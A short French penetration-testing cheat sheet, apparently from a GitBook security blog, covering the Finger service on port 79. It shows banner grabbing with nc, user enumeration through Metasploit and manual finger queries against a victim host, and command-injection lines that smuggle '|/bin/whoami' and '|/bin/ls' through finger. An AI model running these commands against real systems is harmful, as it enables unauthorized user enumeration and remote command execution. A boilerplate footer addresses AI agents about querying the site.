> For the complete documentation index, see [llms.txt](https://blog.hacktive.bebzounette.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://blog.hacktive.bebzounette.com/services/finger-79.md).

# Finger - 79

## 1. Infos:

\
Finger est un programme que vous pouvez utiliser pour trouver des informations sur les utilisateurs d'ordinateurs. Ces informations peuvent inclure l'emplacement du bureau et le numéro de téléphone, le temps de connexion, le temps d'inactivité, l'heure de la dernière lecture de ses mails, ainsi que les fichiers de l'utilisateur.

\
Port par défaut : 79

```
PORT   STATE SERVICE
79/tcp open  finger
```

## **2. Enumération**

### **2.1 Récupération de la bannière et connexion**

```
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
```

### **2.2 Enumération des utilisateurs**

Utilisation du module metasploit :

```
use auxiliary/scanner/finger/finger_users
```

ou vous pouvez le faire à la main :

```
finger @<Machine_Victime> #Liste les utilisateurs
finger user1@<Machine_Victime> #Capture des infos sur l'utilisateur user1
```

### **2.3 Exécution de commandes**

```
finger "|/bin/whoami@PILOU.com"
finger "|/bin/ls -al /@PILOU.com"
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://blog.hacktive.bebzounette.com/services/finger-79.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
